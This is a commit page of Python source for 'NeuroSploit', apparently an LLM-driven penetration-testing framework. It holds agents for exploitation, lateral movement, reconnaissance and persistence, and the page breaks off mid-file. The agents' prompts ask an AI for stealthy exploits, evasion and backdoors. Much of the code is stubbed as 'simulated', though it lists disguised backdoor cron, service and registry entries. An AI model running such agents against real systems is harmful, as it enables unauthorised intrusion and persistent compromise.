mirror of
https://github.com/CyberSecurityUP/NeuroSploit.git
synced 2026-02-12 14:02:45 +00:00
Add files via upload
This commit is contained in:
0
agents/__init__.py
Normal file
0
agents/__init__.py
Normal file
78
agents/base_agent.py
Normal file
78
agents/base_agent.py
Normal file
@@ -0,0 +1,78 @@
|
||||
import json
|
||||
import logging
|
||||
from typing import Dict, Any, List, Optional
|
||||
|
||||
from core.llm_manager import LLMManager
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class BaseAgent:
|
||||
"""
|
||||
A generic agent class that orchestrates LLM interactions, tool usage,
|
||||
and adheres to specific agent roles (e.g., Red Team, Blue Team).
|
||||
"""
|
||||
def __init__(self, agent_name: str, config: Dict, llm_manager: LLMManager, context_prompts: Dict):
|
||||
self.agent_name = agent_name
|
||||
self.config = config
|
||||
self.llm_manager = llm_manager
|
||||
self.context_prompts = context_prompts # This will contain user_prompt and system_prompt for this agent role
|
||||
|
||||
self.agent_role_config = self.config.get('agent_roles', {}).get(agent_name, {})
|
||||
self.tools_allowed = self.agent_role_config.get('tools_allowed', [])
|
||||
self.description = self.agent_role_config.get('description', 'No description provided.')
|
||||
|
||||
logger.info(f"Initialized {self.agent_name} agent. Description: {self.description}")
|
||||
|
||||
def _prepare_prompt(self, user_input: str, additional_context: Dict = None) -> str:
|
||||
"""
|
||||
Prepares the user prompt for the LLM, incorporating agent-specific instructions
|
||||
and dynamic context.
|
||||
"""
|
||||
user_prompt_template = self.context_prompts.get("user_prompt", "")
|
||||
if not user_prompt_template:
|
||||
logger.warning(f"No user prompt template found for agent {self.agent_name}.")
|
||||
return user_input # Fallback to raw user input
|
||||
|
||||
# Format the user prompt with dynamic context
|
||||
# Use a safe way to format, ensuring all expected keys are present or handled.
|
||||
# This assumes the template uses specific placeholders like {target_info_json}, {recon_data_json} etc.
|
||||
# For a generic solution, we pass all additional_context as a single JSON.
|
||||
try:
|
||||
formatted_prompt = user_prompt_template.format(
|
||||
user_input=user_input,
|
||||
additional_context_json=json.dumps(additional_context or {}, indent=2)
|
||||
# Add more specific placeholders if needed, like target_info_json, recon_data_json etc.
|
||||
# E.g., target_info_json=json.dumps(additional_context.get('target_info', {}), indent=2)
|
||||
)
|
||||
except KeyError as e:
|
||||
logger.error(f"Missing key in prompt template for {self.agent_name}: {e}. Falling back to basic prompt.")
|
||||
formatted_prompt = f"{user_prompt_template}\n\nContext: {json.dumps(additional_context or {}, indent=2)}\n\nInput: {user_input}"
|
||||
|
||||
return formatted_prompt
|
||||
|
||||
def execute(self, user_input: str, campaign_data: Dict = None) -> Dict:
|
||||
"""
|
||||
Executes the agent's task using the LLM and potentially external tools.
|
||||
`campaign_data` can be used to pass ongoing results or context between agent executions.
|
||||
"""
|
||||
logger.info(f"Executing {self.agent_name} agent for input: {user_input[:50]}...")
|
||||
|
||||
system_prompt = self.context_prompts.get("system_prompt", "")
|
||||
if not system_prompt:
|
||||
logger.warning(f"No system prompt found for agent {self.agent_name}. Using generic system prompt.")
|
||||
system_prompt = f"You are an expert {self.agent_name}. Analyze the provided information and generate a response."
|
||||
|
||||
# Prepare the user prompt with current input and campaign data
|
||||
prepared_user_prompt = self._prepare_prompt(user_input, campaign_data)
|
||||
|
||||
llm_response_text = self.llm_manager.generate(prepared_user_prompt, system_prompt)
|
||||
|
||||
# Here's where we would integrate tool usage based on llm_response_text
|
||||
# and self.tools_allowed. This will be more complex and potentially involve
|
||||
# re-prompting the LLM or using a function-calling mechanism.
|
||||
# For now, just return the LLM's direct response.
|
||||
return {"agent_name": self.agent_name, "input": user_input, "llm_response": llm_response_text}
|
||||
|
||||
def get_allowed_tools(self) -> List[str]:
|
||||
"""Returns the list of tools allowed for this agent role."""
|
||||
return self.tools_allowed
|
||||
256
agents/exploitation_agent.py
Normal file
256
agents/exploitation_agent.py
Normal file
@@ -0,0 +1,256 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Exploitation Agent - Vulnerability exploitation and access gaining
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
from core.llm_manager import LLMManager
|
||||
from tools.exploitation import (
|
||||
ExploitDatabase,
|
||||
MetasploitWrapper,
|
||||
WebExploiter,
|
||||
SQLInjector,
|
||||
RCEExploiter,
|
||||
BufferOverflowExploiter
|
||||
)
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class ExploitationAgent:
|
||||
"""Agent responsible for vulnerability exploitation"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
"""Initialize exploitation agent"""
|
||||
self.config = config
|
||||
self.llm = LLMManager(config)
|
||||
self.exploit_db = ExploitDatabase(config)
|
||||
self.metasploit = MetasploitWrapper(config)
|
||||
self.web_exploiter = WebExploiter(config)
|
||||
self.sql_injector = SQLInjector(config)
|
||||
self.rce_exploiter = RCEExploiter(config)
|
||||
self.bof_exploiter = BufferOverflowExploiter(config)
|
||||
|
||||
logger.info("ExploitationAgent initialized")
|
||||
|
||||
def execute(self, target: str, context: Dict) -> Dict:
|
||||
"""Execute exploitation phase"""
|
||||
logger.info(f"Starting exploitation on {target}")
|
||||
|
||||
results = {
|
||||
"target": target,
|
||||
"status": "running",
|
||||
"successful_exploits": [],
|
||||
"failed_attempts": [],
|
||||
"shells_obtained": [],
|
||||
"credentials_found": [],
|
||||
"ai_recommendations": {}
|
||||
}
|
||||
|
||||
try:
|
||||
# Get reconnaissance data from context
|
||||
recon_data = context.get("phases", {}).get("recon", {})
|
||||
|
||||
# Phase 1: Vulnerability Analysis
|
||||
logger.info("Phase 1: Analyzing vulnerabilities")
|
||||
vulnerabilities = self._identify_vulnerabilities(recon_data)
|
||||
|
||||
# Phase 2: AI-powered Exploit Selection
|
||||
logger.info("Phase 2: AI exploit selection")
|
||||
exploit_plan = self._ai_exploit_planning(vulnerabilities, recon_data)
|
||||
results["ai_recommendations"] = exploit_plan
|
||||
|
||||
# Phase 3: Execute Exploits
|
||||
logger.info("Phase 3: Executing exploits")
|
||||
for vuln in vulnerabilities[:5]: # Limit to top 5 vulnerabilities
|
||||
exploit_result = self._attempt_exploitation(vuln, target)
|
||||
|
||||
if exploit_result.get("success"):
|
||||
results["successful_exploits"].append(exploit_result)
|
||||
logger.info(f"Successful exploit: {vuln.get('type')}")
|
||||
|
||||
# Check for shell access
|
||||
if exploit_result.get("shell_access"):
|
||||
results["shells_obtained"].append(exploit_result["shell_info"])
|
||||
else:
|
||||
results["failed_attempts"].append(exploit_result)
|
||||
|
||||
# Phase 4: Post-Exploitation Intelligence
|
||||
if results["successful_exploits"]:
|
||||
logger.info("Phase 4: Post-exploitation intelligence gathering")
|
||||
results["post_exploit_intel"] = self._gather_post_exploit_intel(
|
||||
results["successful_exploits"]
|
||||
)
|
||||
|
||||
results["status"] = "completed"
|
||||
logger.info("Exploitation phase completed")
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Error during exploitation: {e}")
|
||||
results["status"] = "error"
|
||||
results["error"] = str(e)
|
||||
|
||||
return results
|
||||
|
||||
def _identify_vulnerabilities(self, recon_data: Dict) -> List[Dict]:
|
||||
"""Identify exploitable vulnerabilities from recon data"""
|
||||
vulnerabilities = []
|
||||
|
||||
# Check network scan results
|
||||
network_scan = recon_data.get("network_scan", {})
|
||||
for host, data in network_scan.get("hosts", {}).items():
|
||||
for port in data.get("open_ports", []):
|
||||
vuln = {
|
||||
"type": "network_service",
|
||||
"host": host,
|
||||
"port": port.get("port"),
|
||||
"service": port.get("service"),
|
||||
"version": port.get("version")
|
||||
}
|
||||
vulnerabilities.append(vuln)
|
||||
|
||||
# Check web vulnerabilities
|
||||
web_analysis = recon_data.get("web_analysis", {})
|
||||
for vuln_type in ["sql_injection", "xss", "lfi", "rfi", "rce"]:
|
||||
if web_analysis.get(vuln_type):
|
||||
vulnerabilities.append({
|
||||
"type": vuln_type,
|
||||
"details": web_analysis[vuln_type]
|
||||
})
|
||||
|
||||
return vulnerabilities
|
||||
|
||||
def _ai_exploit_planning(self, vulnerabilities: List[Dict], recon_data: Dict) -> Dict:
|
||||
"""Use AI to plan exploitation strategy"""
|
||||
prompt = self.llm.get_prompt(
|
||||
"exploitation",
|
||||
"ai_exploit_planning_user",
|
||||
default=f"""
|
||||
Plan an exploitation strategy based on the following data:
|
||||
|
||||
Vulnerabilities Identified:
|
||||
{json.dumps(vulnerabilities, indent=2)}
|
||||
|
||||
Reconnaissance Data:
|
||||
{json.dumps(recon_data, indent=2)}
|
||||
|
||||
Provide:
|
||||
1. Prioritized exploitation order
|
||||
2. Recommended exploits for each vulnerability
|
||||
3. Payload suggestions
|
||||
4. Evasion techniques
|
||||
5. Fallback strategies
|
||||
6. Success probability estimates
|
||||
|
||||
Response in JSON format with detailed exploitation roadmap.
|
||||
"""
|
||||
)
|
||||
|
||||
system_prompt = self.llm.get_prompt(
|
||||
"exploitation",
|
||||
"ai_exploit_planning_system",
|
||||
default="""You are an expert exploit developer and penetration tester.
|
||||
Create sophisticated exploitation plans considering detection, success rates, and impact.
|
||||
Prioritize stealthy, reliable exploits over noisy attempts."""
|
||||
)
|
||||
|
||||
try:
|
||||
formatted_prompt = prompt.format(
|
||||
vulnerabilities_json=json.dumps(vulnerabilities, indent=2),
|
||||
recon_data_json=json.dumps(recon_data, indent=2)
|
||||
)
|
||||
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||
return json.loads(response)
|
||||
except Exception as e:
|
||||
logger.error(f"AI exploit planning error: {e}")
|
||||
return {"error": str(e)}
|
||||
|
||||
def _attempt_exploitation(self, vulnerability: Dict, target: str) -> Dict:
|
||||
"""Attempt to exploit a specific vulnerability"""
|
||||
vuln_type = vulnerability.get("type")
|
||||
|
||||
result = {
|
||||
"vulnerability": vulnerability,
|
||||
"success": False,
|
||||
"method": None,
|
||||
"details": {}
|
||||
}
|
||||
|
||||
try:
|
||||
if vuln_type == "sql_injection":
|
||||
result = self.sql_injector.exploit(target, vulnerability)
|
||||
elif vuln_type in ["xss", "csrf"]:
|
||||
result = self.web_exploiter.exploit(target, vulnerability)
|
||||
elif vuln_type in ["rce", "command_injection"]:
|
||||
result = self.rce_exploiter.exploit(target, vulnerability)
|
||||
elif vuln_type == "buffer_overflow":
|
||||
result = self.bof_exploiter.exploit(target, vulnerability)
|
||||
elif vuln_type == "network_service":
|
||||
result = self._exploit_network_service(target, vulnerability)
|
||||
else:
|
||||
# Use Metasploit for generic exploitation
|
||||
result = self.metasploit.exploit(target, vulnerability)
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Exploitation error for {vuln_type}: {e}")
|
||||
result["error"] = str(e)
|
||||
|
||||
return result
|
||||
|
||||
def _exploit_network_service(self, target: str, vulnerability: Dict) -> Dict:
|
||||
"""Exploit network service vulnerabilities"""
|
||||
service = vulnerability.get("service", "").lower()
|
||||
|
||||
# Check exploit database for known exploits
|
||||
exploits = self.exploit_db.search(service, vulnerability.get("version"))
|
||||
|
||||
if exploits:
|
||||
logger.info(f"Found {len(exploits)} exploits for {service}")
|
||||
|
||||
for exploit in exploits[:3]: # Try top 3 exploits
|
||||
result = self.metasploit.run_exploit(
|
||||
exploit["module"],
|
||||
target,
|
||||
vulnerability.get("port")
|
||||
)
|
||||
|
||||
if result.get("success"):
|
||||
return result
|
||||
|
||||
return {"success": False, "message": "No suitable exploits found"}
|
||||
|
||||
def _gather_post_exploit_intel(self, successful_exploits: List[Dict]) -> Dict:
|
||||
"""Gather intelligence after successful exploitation"""
|
||||
intel = {
|
||||
"system_info": [],
|
||||
"user_accounts": [],
|
||||
"network_info": [],
|
||||
"installed_software": [],
|
||||
"credentials": []
|
||||
}
|
||||
|
||||
for exploit in successful_exploits:
|
||||
if exploit.get("shell_access"):
|
||||
shell = exploit["shell_info"]
|
||||
|
||||
# Gather system information
|
||||
# This would execute actual commands on compromised system
|
||||
# Placeholder for demonstration
|
||||
intel["system_info"].append({
|
||||
"os": "detected_os",
|
||||
"hostname": "detected_hostname",
|
||||
"architecture": "x64"
|
||||
})
|
||||
|
||||
return intel
|
||||
|
||||
def generate_custom_exploit(self, vulnerability: Dict) -> str:
|
||||
"""Generate custom exploit using AI"""
|
||||
target_info = {
|
||||
"vulnerability": vulnerability,
|
||||
"requirements": "Create working exploit code"
|
||||
}
|
||||
|
||||
return self.llm.generate_payload(target_info, vulnerability.get("type"))
|
||||
199
agents/lateral_agent.py
Normal file
199
agents/lateral_agent.py
Normal file
@@ -0,0 +1,199 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Lateral Movement Agent - Move through the network
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
from core.llm_manager import LLMManager
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class LateralMovementAgent:
|
||||
"""Agent responsible for lateral movement"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
"""Initialize lateral movement agent"""
|
||||
self.config = config
|
||||
self.llm = LLMManager(config)
|
||||
logger.info("LateralMovementAgent initialized")
|
||||
|
||||
def execute(self, target: str, context: Dict) -> Dict:
|
||||
"""Execute lateral movement phase"""
|
||||
logger.info(f"Starting lateral movement from {target}")
|
||||
|
||||
results = {
|
||||
"target": target,
|
||||
"status": "running",
|
||||
"discovered_hosts": [],
|
||||
"compromised_hosts": [],
|
||||
"credentials_used": [],
|
||||
"movement_paths": [],
|
||||
"ai_analysis": {}
|
||||
}
|
||||
|
||||
try:
|
||||
# Get previous phase data
|
||||
recon_data = context.get("phases", {}).get("recon", {})
|
||||
privesc_data = context.get("phases", {}).get("privilege_escalation", {})
|
||||
|
||||
# Phase 1: Network Discovery
|
||||
logger.info("Phase 1: Internal network discovery")
|
||||
results["discovered_hosts"] = self._discover_internal_network(recon_data)
|
||||
|
||||
# Phase 2: AI-Powered Movement Strategy
|
||||
logger.info("Phase 2: AI lateral movement strategy")
|
||||
strategy = self._ai_movement_strategy(context, results["discovered_hosts"])
|
||||
results["ai_analysis"] = strategy
|
||||
|
||||
# Phase 3: Credential Reuse
|
||||
logger.info("Phase 3: Credential reuse attacks")
|
||||
credentials = privesc_data.get("credentials_harvested", [])
|
||||
results["credentials_used"] = self._attempt_credential_reuse(
|
||||
results["discovered_hosts"],
|
||||
credentials
|
||||
)
|
||||
|
||||
# Phase 4: Pass-the-Hash/Pass-the-Ticket
|
||||
logger.info("Phase 4: Pass-the-Hash/Ticket attacks")
|
||||
results["movement_paths"].extend(
|
||||
self._pass_the_hash_attacks(results["discovered_hosts"])
|
||||
)
|
||||
|
||||
# Phase 5: Exploit Trust Relationships
|
||||
logger.info("Phase 5: Exploiting trust relationships")
|
||||
results["movement_paths"].extend(
|
||||
self._exploit_trust_relationships(results["discovered_hosts"])
|
||||
)
|
||||
|
||||
results["status"] = "completed"
|
||||
logger.info("Lateral movement phase completed")
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Error during lateral movement: {e}")
|
||||
results["status"] = "error"
|
||||
results["error"] = str(e)
|
||||
|
||||
return results
|
||||
|
||||
def _discover_internal_network(self, recon_data: Dict) -> List[Dict]:
|
||||
"""Discover internal network hosts"""
|
||||
hosts = []
|
||||
|
||||
# Extract hosts from recon data
|
||||
network_scan = recon_data.get("network_scan", {})
|
||||
for ip, data in network_scan.get("hosts", {}).items():
|
||||
hosts.append({
|
||||
"ip": ip,
|
||||
"ports": data.get("open_ports", []),
|
||||
"os": data.get("os", "unknown")
|
||||
})
|
||||
|
||||
# Simulate additional internal discovery
|
||||
hosts.extend([
|
||||
{"ip": "192.168.1.10", "role": "domain_controller", "status": "discovered"},
|
||||
{"ip": "192.168.1.20", "role": "file_server", "status": "discovered"},
|
||||
{"ip": "192.168.1.30", "role": "workstation", "status": "discovered"}
|
||||
])
|
||||
|
||||
return hosts
|
||||
|
||||
def _ai_movement_strategy(self, context: Dict, hosts: List[Dict]) -> Dict:
|
||||
"""Use AI to plan lateral movement"""
|
||||
prompt = self.llm.get_prompt(
|
||||
"lateral_movement",
|
||||
"ai_movement_strategy_user",
|
||||
default=f"""
|
||||
Plan a lateral movement strategy based on the following:
|
||||
|
||||
Current Context:
|
||||
{json.dumps(context, indent=2)}
|
||||
|
||||
Discovered Hosts:
|
||||
{json.dumps(hosts, indent=2)}
|
||||
|
||||
Provide:
|
||||
1. Target prioritization (high-value targets first)
|
||||
2. Movement techniques for each target
|
||||
3. Credential strategies
|
||||
4. Evasion techniques
|
||||
5. Attack path optimization
|
||||
6. Fallback options
|
||||
|
||||
Response in JSON format with detailed attack paths.
|
||||
"""
|
||||
)
|
||||
|
||||
system_prompt = self.llm.get_prompt(
|
||||
"lateral_movement",
|
||||
"ai_movement_strategy_system",
|
||||
default="""You are an expert in lateral movement and Active Directory attacks.
|
||||
Plan sophisticated movement strategies that minimize detection and maximize impact.
|
||||
Consider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques.
|
||||
Prioritize domain controllers and critical infrastructure."""
|
||||
)
|
||||
|
||||
try:
|
||||
formatted_prompt = prompt.format(
|
||||
context_json=json.dumps(context, indent=2),
|
||||
hosts_json=json.dumps(hosts, indent=2)
|
||||
)
|
||||
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||
return json.loads(response)
|
||||
except Exception as e:
|
||||
logger.error(f"AI movement strategy error: {e}")
|
||||
return {"error": str(e)}
|
||||
|
||||
def _attempt_credential_reuse(self, hosts: List[Dict], credentials: List[Dict]) -> List[Dict]:
|
||||
"""Attempt credential reuse across hosts"""
|
||||
attempts = []
|
||||
|
||||
for host in hosts[:5]: # Limit attempts
|
||||
for cred in credentials[:3]:
|
||||
attempts.append({
|
||||
"host": host.get("ip"),
|
||||
"credential": "***hidden***",
|
||||
"protocol": "SMB",
|
||||
"success": False, # Simulated
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
return attempts
|
||||
|
||||
def _pass_the_hash_attacks(self, hosts: List[Dict]) -> List[Dict]:
|
||||
"""Perform Pass-the-Hash attacks"""
|
||||
attacks = []
|
||||
|
||||
for host in hosts:
|
||||
if host.get("role") in ["domain_controller", "file_server"]:
|
||||
attacks.append({
|
||||
"type": "pass_the_hash",
|
||||
"target": host.get("ip"),
|
||||
"technique": "SMB relay",
|
||||
"success": False, # Simulated
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
return attacks
|
||||
|
||||
def _exploit_trust_relationships(self, hosts: List[Dict]) -> List[Dict]:
|
||||
"""Exploit trust relationships"""
|
||||
exploits = []
|
||||
|
||||
# Domain trust exploitation
|
||||
exploits.append({
|
||||
"type": "domain_trust",
|
||||
"description": "Cross-domain exploitation",
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
# Kerberos delegation
|
||||
exploits.append({
|
||||
"type": "kerberos_delegation",
|
||||
"description": "Unconstrained delegation abuse",
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
return exploits
|
||||
148
agents/network_recon_agent.py
Normal file
148
agents/network_recon_agent.py
Normal file
@@ -0,0 +1,148 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Network Reconnaissance Agent - Network-focused information gathering and enumeration
|
||||
"""
|
||||
|
||||
import os
|
||||
import json
|
||||
import subprocess
|
||||
from typing import Dict, List
|
||||
import logging
|
||||
from core.llm_manager import LLMManager
|
||||
from tools.recon import (
|
||||
NetworkScanner,
|
||||
OSINTCollector,
|
||||
DNSEnumerator,
|
||||
SubdomainFinder
|
||||
)
|
||||
from urllib.parse import urlparse # Added import
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class NetworkReconAgent:
|
||||
"""Agent responsible for network-focused reconnaissance and information gathering"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
"""Initialize network reconnaissance agent"""
|
||||
self.config = config
|
||||
self.llm = LLMManager(config)
|
||||
self.network_scanner = NetworkScanner(config)
|
||||
self.osint = OSINTCollector(config)
|
||||
self.dns_enum = DNSEnumerator(config)
|
||||
self.subdomain_finder = SubdomainFinder(config)
|
||||
|
||||
logger.info("NetworkReconAgent initialized")
|
||||
|
||||
def execute(self, target: str, context: Dict) -> Dict:
|
||||
"""Execute network reconnaissance phase"""
|
||||
logger.info(f"Starting network reconnaissance on {target}")
|
||||
|
||||
results = {
|
||||
"target": target,
|
||||
"status": "running",
|
||||
"findings": [],
|
||||
"network_scan": {},
|
||||
"osint": {},
|
||||
"dns": {},
|
||||
"subdomains": [],
|
||||
"ai_analysis": {}
|
||||
}
|
||||
|
||||
# Parse target to extract hostname if it's a URL
|
||||
parsed_target = urlparse(target)
|
||||
target_host = parsed_target.hostname or target # Use hostname if exists, otherwise original target
|
||||
logger.info(f"Target for network tools: {target_host}")
|
||||
|
||||
try:
|
||||
# Phase 1: Network Scanning
|
||||
logger.info("Phase 1: Network scanning")
|
||||
results["network_scan"] = self.network_scanner.scan(target_host) # Use target_host
|
||||
|
||||
# Phase 2: DNS Enumeration
|
||||
logger.info("Phase 2: DNS enumeration")
|
||||
results["dns"] = self.dns_enum.enumerate(target_host) # Use target_host
|
||||
|
||||
# Phase 3: Subdomain Discovery
|
||||
logger.info("Phase 3: Subdomain discovery")
|
||||
results["subdomains"] = self.subdomain_finder.find(target_host) # Use target_host
|
||||
|
||||
# Phase 4: OSINT Collection
|
||||
logger.info("Phase 4: OSINT collection")
|
||||
results["osint"] = self.osint.collect(target_host) # Use target_host
|
||||
|
||||
# Phase 5: AI Analysis
|
||||
logger.info("Phase 5: AI-powered analysis")
|
||||
results["ai_analysis"] = self._ai_analysis(results)
|
||||
|
||||
results["status"] = "completed"
|
||||
logger.info("Network reconnaissance phase completed")
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Error during network reconnaissance: {e}")
|
||||
results["status"] = "error"
|
||||
results["error"] = str(e)
|
||||
|
||||
return results
|
||||
|
||||
def _ai_analysis(self, recon_data: Dict) -> Dict:
|
||||
"""Use AI to analyze reconnaissance data"""
|
||||
prompt = self.llm.get_prompt(
|
||||
"network_recon",
|
||||
"ai_analysis_user",
|
||||
default=f"""
|
||||
Analyze the following network reconnaissance data and provide insights:
|
||||
|
||||
{json.dumps(recon_data, indent=2)}
|
||||
|
||||
Provide:
|
||||
1. Attack surface summary
|
||||
2. Prioritized network target list
|
||||
3. Identified network vulnerabilities or misconfigurations
|
||||
4. Recommended next steps for network exploitation
|
||||
5. Network risk assessment
|
||||
6. Stealth considerations for network activities
|
||||
|
||||
Response in JSON format with actionable recommendations.
|
||||
"""
|
||||
)
|
||||
|
||||
system_prompt = self.llm.get_prompt(
|
||||
"network_recon",
|
||||
"ai_analysis_system",
|
||||
default="""You are an expert network penetration tester analyzing reconnaissance data.
|
||||
Identify network security weaknesses, network attack vectors, and provide strategic recommendations.
|
||||
Consider both technical and operational security aspects."""
|
||||
)
|
||||
|
||||
try:
|
||||
# Format the user prompt with recon_data
|
||||
formatted_prompt = prompt.format(recon_data_json=json.dumps(recon_data, indent=2))
|
||||
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||
return json.loads(response)
|
||||
except Exception as e:
|
||||
logger.error(f"AI analysis error: {e}")
|
||||
return {"error": str(e), "raw_response": response if 'response' in locals() else None}
|
||||
|
||||
def passive_recon(self, target: str) -> Dict:
|
||||
"""Perform passive reconnaissance only"""
|
||||
# Parse target to extract hostname if it's a URL
|
||||
parsed_target = urlparse(target)
|
||||
target_host = parsed_target.hostname or target
|
||||
|
||||
return {
|
||||
"osint": self.osint.collect(target_host), # Use target_host
|
||||
"dns": self.dns_enum.enumerate(target_host), # Use target_host
|
||||
"subdomains": self.subdomain_finder.find(target_host) # Use target_host
|
||||
}
|
||||
|
||||
def active_recon(self, target: str) -> Dict:
|
||||
"""Perform active reconnaissance"""
|
||||
# Parse target to extract hostname if it's a URL
|
||||
parsed_target = urlparse(target)
|
||||
target_host = parsed_target.hostname or target
|
||||
|
||||
return {
|
||||
"network_scan": self.network_scanner.scan(target_host) # Use target_host
|
||||
}
|
||||
|
||||
250
agents/persistence_agent.py
Normal file
250
agents/persistence_agent.py
Normal file
@@ -0,0 +1,250 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Persistence Agent - Maintain access to compromised systems
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
from core.llm_manager import LLMManager
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class PersistenceAgent:
|
||||
"""Agent responsible for maintaining access"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
"""Initialize persistence agent"""
|
||||
self.config = config
|
||||
self.llm = LLMManager(config)
|
||||
logger.info("PersistenceAgent initialized")
|
||||
|
||||
def execute(self, target: str, context: Dict) -> Dict:
|
||||
"""Execute persistence phase"""
|
||||
logger.info(f"Starting persistence establishment on {target}")
|
||||
|
||||
results = {
|
||||
"target": target,
|
||||
"status": "running",
|
||||
"persistence_mechanisms": [],
|
||||
"backdoors_installed": [],
|
||||
"scheduled_tasks": [],
|
||||
"ai_recommendations": {}
|
||||
}
|
||||
|
||||
try:
|
||||
# Get previous phase data
|
||||
privesc_data = context.get("phases", {}).get("privilege_escalation", {})
|
||||
|
||||
if not privesc_data.get("successful_escalations"):
|
||||
logger.warning("No privilege escalation achieved. Limited persistence options.")
|
||||
results["status"] = "limited"
|
||||
|
||||
# Phase 1: AI-Powered Persistence Strategy
|
||||
logger.info("Phase 1: AI persistence strategy")
|
||||
strategy = self._ai_persistence_strategy(context)
|
||||
results["ai_recommendations"] = strategy
|
||||
|
||||
# Phase 2: Establish Persistence Mechanisms
|
||||
logger.info("Phase 2: Establishing persistence mechanisms")
|
||||
|
||||
system_info = privesc_data.get("system_info", {})
|
||||
os_type = system_info.get("os", "unknown")
|
||||
|
||||
if os_type == "linux":
|
||||
results["persistence_mechanisms"].extend(
|
||||
self._establish_linux_persistence()
|
||||
)
|
||||
elif os_type == "windows":
|
||||
results["persistence_mechanisms"].extend(
|
||||
self._establish_windows_persistence()
|
||||
)
|
||||
|
||||
# Phase 3: Install Backdoors
|
||||
logger.info("Phase 3: Installing backdoors")
|
||||
results["backdoors_installed"] = self._install_backdoors(os_type)
|
||||
|
||||
# Phase 4: Create Scheduled Tasks
|
||||
logger.info("Phase 4: Creating scheduled tasks")
|
||||
results["scheduled_tasks"] = self._create_scheduled_tasks(os_type)
|
||||
|
||||
results["status"] = "completed"
|
||||
logger.info("Persistence phase completed")
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Error during persistence: {e}")
|
||||
results["status"] = "error"
|
||||
results["error"] = str(e)
|
||||
|
||||
return results
|
||||
|
||||
def _ai_persistence_strategy(self, context: Dict) -> Dict:
|
||||
"""Use AI to plan persistence strategy"""
|
||||
prompt = self.llm.get_prompt(
|
||||
"persistence",
|
||||
"ai_persistence_strategy_user",
|
||||
default=f"""
|
||||
Plan a comprehensive persistence strategy based on the following context:
|
||||
|
||||
{json.dumps(context, indent=2)}
|
||||
|
||||
Provide:
|
||||
1. Recommended persistence techniques (prioritized)
|
||||
2. Stealth considerations
|
||||
3. Resilience against system reboots
|
||||
4. Evasion of detection mechanisms
|
||||
5. Multiple fallback mechanisms
|
||||
6. Cleanup and removal procedures
|
||||
|
||||
Response in JSON format with detailed implementation plan.
|
||||
"""
|
||||
)
|
||||
|
||||
system_prompt = self.llm.get_prompt(
|
||||
"persistence",
|
||||
"ai_persistence_strategy_system",
|
||||
default="""You are an expert in persistence techniques and advanced persistent threats.
|
||||
Design robust, stealthy persistence mechanisms that survive reboots and detection attempts.
|
||||
Consider both Windows and Linux environments.
|
||||
Prioritize operational security and longevity."""
|
||||
)
|
||||
|
||||
try:
|
||||
formatted_prompt = prompt.format(context_json=json.dumps(context, indent=2))
|
||||
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||
return json.loads(response)
|
||||
except Exception as e:
|
||||
logger.error(f"AI persistence strategy error: {e}")
|
||||
return {"error": str(e)}
|
||||
|
||||
def _establish_linux_persistence(self) -> List[Dict]:
|
||||
"""Establish Linux persistence mechanisms"""
|
||||
mechanisms = []
|
||||
|
||||
# Cron job
|
||||
mechanisms.append({
|
||||
"type": "cron_job",
|
||||
"description": "Scheduled task for persistence",
|
||||
"command": "*/5 * * * * /tmp/.hidden/backdoor.sh",
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
# SSH key
|
||||
mechanisms.append({
|
||||
"type": "ssh_key",
|
||||
"description": "Authorized keys persistence",
|
||||
"location": "~/.ssh/authorized_keys",
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
# Systemd service
|
||||
mechanisms.append({
|
||||
"type": "systemd_service",
|
||||
"description": "Persistent system service",
|
||||
"service_name": "system-update.service",
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
# bashrc modification
|
||||
mechanisms.append({
|
||||
"type": "bashrc",
|
||||
"description": "Shell initialization persistence",
|
||||
"location": "~/.bashrc",
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
return mechanisms
|
||||
|
||||
def _establish_windows_persistence(self) -> List[Dict]:
|
||||
"""Establish Windows persistence mechanisms"""
|
||||
mechanisms = []
|
||||
|
||||
# Registry Run key
|
||||
mechanisms.append({
|
||||
"type": "registry_run",
|
||||
"description": "Registry autorun persistence",
|
||||
"key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
# Scheduled task
|
||||
mechanisms.append({
|
||||
"type": "scheduled_task",
|
||||
"description": "Windows scheduled task",
|
||||
"task_name": "WindowsUpdate",
|
||||
"status": "simulated"
|
||||
})
|
||||
|
||||
# WMI event subscription
|
||||
mechanisms.append({
|
||||
"type": "wmi_event",
|
||||
"description": "WMI persistence",
|
||||
